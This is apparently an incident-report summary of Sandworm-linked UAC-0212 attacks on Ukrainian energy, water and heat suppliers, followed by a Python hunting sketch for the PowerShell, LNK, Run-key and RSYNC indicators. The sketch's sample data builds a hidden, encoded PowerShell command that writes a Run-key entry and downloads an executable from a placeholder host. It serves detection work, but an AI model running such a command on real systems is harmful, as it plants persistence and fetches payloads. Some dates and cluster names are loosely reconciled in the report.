Full Report
In Q1 2024, defenders uncovered destructive cyberattacks against the information and communication technology (ICT) systems of approximately 20 organizations in the critical infrastructure sector across 10 regions of Ukraine. CERT-UA has been observing this activity tracked as a separate threat cluster, UAC-0133, which, with a high level of confidence, is linked to a nefarious russia-affiliated […] The post UAC-0212 Attack Detection: Hackers Linked to UAC-0002 aka Sandworm APT Subcluster Launch Targeted Attacks Against the Ukrainian Critical Infrastructure appeared first on SOC Prime.
Analysis Summary
# Incident Report: UAC-0212/Sandworm APT Attacks Against Ukrainian Critical Infrastructure
## Executive Summary
Between Q1 2024 and February 2025, a threat cluster identified as UAC-0212, strongly linked to the Russia-affiliated Sandworm APT (UAC-0002), conducted widespread destructive cyberattacks targeting nearly 20 critical infrastructure organizations in Ukraine. The attackers used spear-phishing involving malicious PDF documents linked to CVE-2024-38213 exploitation to gain initial access, ultimately aiming to disrupt essential services like energy, water, and heat supply. Response involved detection via security platforms and analysis by CERT-UA, leading to community alerts regarding the group's escalating TTPs.
## Incident Details
- Discovery Date: Q1 2024 (Initial observation of planned activity); Alerts escalated in February 2025.
- Incident Date: Activity ongoing from mid-spring 2024 through February 2025.
- Affected Organization: Approximately 20 organizations in Ukraine across energy, water, and heat supply sectors (Critical Infrastructure/ICT providers); later expanded to supplier companies in Serbia and Czechia, and logistics firms in Ukraine.
- Sector: Critical Infrastructure (Energy, Water, Heat Supply), ICT Service Providers, Logistics, Manufacturing (Grain equipment).
- Geography: Ukraine (primary target), later Serbia and Czechia.
## Timeline of Events
### Initial Access
- Date/Time: Second half of 2024 onwards.
- Vector: Spear-phishing via malicious PDF documents disguised as "technical documentation", sent by attackers posing as potential clients.
- Details: Clicking a link in the email led to the exploitation of **CVE-2024-38213**, triggering the download of an LNK file (`pdf.lnk`).
### Lateral Movement
- Details: Execution of the LNK file launched a PowerShell command that persisted access (via the Run registry key), downloaded further executables (EXE/DLL files), and was followed by reconnaissance and deployment of custom tools like SECONDBEST / EMPIREPAST, SPARK malware, and CROOKBAG.
### Data Exfiltration/Impact
- Details: Attackers utilized **RSYNC** for prolonged document exfiltration. The ultimate objective appeared to be cyber-sabotage, aiming to disrupt the ICT systems of critical infrastructure and essential service enterprises.
### Detection & Response
- **Detection**: Activity tracked by CERT-UA as **UAC-0133** (linked to UAC-0212). Detections relied on identifying suspicious PowerShell execution, LNK file usage, persistence mechanisms, and communication via RSYNC.
- **Response**: CERT-UA issued alerts (e.g., CERT-UA#13702) warning defenders and enabling the deployment of specific detection algorithms on platforms like SOC Prime.
## Attack Methodology (Based on observed TTPs)
- Initial Access: User Execution: Malicious Link (T1204.001) via exploited CVE-2024-38213.
- Persistence: Boot or Logon Initialization Scripts (T1037) via Registry Run Keys (T1547.001).
- Privilege Escalation: *Not explicitly detailed, but implied by tool execution.*
- Defense Evasion: Obfuscation (T1027.010) via base64 encoding in PowerShell, execution via hidden window (T1564.003), and use of LOLBAS like **ForFiles** and **MSHTA**.
- Credential Access: *Not explicitly detailed.*
- Discovery: *Implied by subsequent execution of established C2 frameworks.*
- Lateral Movement: *Implied by the use of custom malware and attacker presence across multiple victim systems.*
- Collection: Custom malware (SECONDBEST, SPARK, CROOKBAG) designed to prepare targets.
- Exfiltration: Exfiltration Over Web Service (T1567) using **RSYNC**.
- Impact: Destructive cyber-attacks planned against essential service continuity.
## Impact Assessment
- Financial: *Not disclosed.*
- Data Breach: Exfiltration of documents/data occurred using RSYNC, likely preparatory intelligence or system configuration data for destructive payload delivery.
- Operational: High risk of severe operational disruption to Ukrainian energy, water, and heat supply sectors.
- Reputational: Targeting critical national infrastructure suggests significant national security impact.
## Indicators of Compromise
- Network Indicators: Traffic related to **RSYNC** used for C2/Exfiltration.
- File Indicators: LNK files with double extensions (e.g., `pdf.lnk`), EXE/DLL files associated with SPARK, SECONDBEST, or CROOKBAG.
- Behavioral Indicators: Suspicious PowerShell execution involving base64 decoding, loading .NET methods, and downloading files (`cmdline` observables), registry modifications for persistence (Run keys).
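A hunting sketch for the behavioural indicators above, added here as an example and not part of SOC Prime's or CERT-UA's material: it classifies process-creation records (a constructed sample set in a Sysmon Event ID 1 / Windows 4688-like shape) by encoded or hidden-window PowerShell, Run-key persistence and download strings found in the decoded script, double-extension LNK paths, and rsync execution on a Windows host. The field names, regexes and sample values are my assumptions.

```python
import base64
import re
# Regexes and sample events here are constructed for this example, not CERT-UA's IoCs.
ENCODED_ARG = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
DOUBLE_EXT_LNK = re.compile(r"\.(?:pdf|docx?|xlsx?)\.lnk\b", re.I)
SCRIPT_PATTERNS = [  # checked against raw and decoded PowerShell text
    (re.compile(r"CurrentVersion\\Run\b", re.I), "run_key_persistence"),
    (re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest", re.I), "payload_download"),
    (re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load", re.I), "dotnet_assembly_load"),
]

def decode_encoded_command(cmdline: str) -> str:
    """Decode a -EncodedCommand argument (base64 of UTF-16LE), or return ''."""
    m = ENCODED_ARG.search(cmdline)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le") if m else ""
    except ValueError:  # not valid base64/UTF-16, so nothing to inspect
        return ""

def classify_event(event: dict) -> list[str]:
    """Map one process-creation record to the behavioural indicators it matches."""
    cmd, image = event.get("cmdline", ""), event.get("image", "").lower()
    hits = []
    if DOUBLE_EXT_LNK.search(cmd):
        hits.append("double_extension_lnk")
    if image.endswith(("powershell.exe", "pwsh.exe")):
        decoded = decode_encoded_command(cmd)
        if decoded:
            hits.append("encoded_powershell")
        if HIDDEN_WINDOW.search(cmd):
            hits.append("hidden_window")
        hits += [name for pat, name in SCRIPT_PATTERNS if pat.search(cmd + " " + decoded)]
    if image.endswith("rsync.exe"):
        hits.append("rsync_on_windows_host")  # hunting lead, not proof of exfiltration
    return hits

def hunt(events: list[dict]) -> list[tuple[int, list[str]]]:
    return [(i, h) for i, e in enumerate(events) if (h := classify_event(e))]

def _enc(script: str) -> str:  # build an -EncodedCommand argument as PowerShell expects it
    return base64.b64encode(script.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [  # constructed records in a Sysmon Event ID 1 / Windows 4688-like shape
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc " + _enc(
         r"Set-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name upd -Value C:\Users\Public\upd.exe; "
         "(New-Object Net.WebClient).DownloadFile('http://example.invalid/u', 'C:\\Users\\Public\\upd.exe')")},
    {"image": r"C:\Windows\explorer.exe", "cmdline": r'"C:\Users\u\Downloads\documentation.pdf.lnk"'},
]
```

`hunt(SAMPLE_EVENTS)` flags the first record on four indicators and the second only on the double-extension LNK path; a benign process yields no hits.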
## Response Actions
- **Containment:** (Implied) Blocking identified IOCs and hunting for persistence mechanisms (Registry Run Keys).
- **Eradication:** (Implied) Removal of LNK files, executables (SECONDBEST/SPARK/CROOKBAG), and reversing registry modifications.
- **Recovery:** (Implied) Restoring system integrity, particularly focusing on ICT service provider networks to prevent cascading failure into critical infrastructure.
## Lessons Learned
- State-sponsored threat actors, specifically Sandworm, continue refining TTPs using initial access brokers/supply chain vectors (targeting ICT providers before infrastructure).
- Exploitation of common document handlers combined with known vulnerabilities (CVE-2024-38213) remains a viable access vector.
- Custom tools (CROOKBAG, SPARK) and living-off-the-land binaries (LOLBAS) are heavily utilized for persistence and evasion.
## Recommendations
- Implement strict email gateway defenses, particularly concerning links embedded within PDF documents, and enforce the Principle of Least Privilege to limit the impact of CVE exploitation.
- Proactive threat hunting should focus specifically on LNK file execution, PowerShell commands attempting persistence via Run keys, and unusual RSYNC activity across the network perimeter.
- Ensure robust network segmentation between managed service providers and critical infrastructure components to prevent lateral escalation.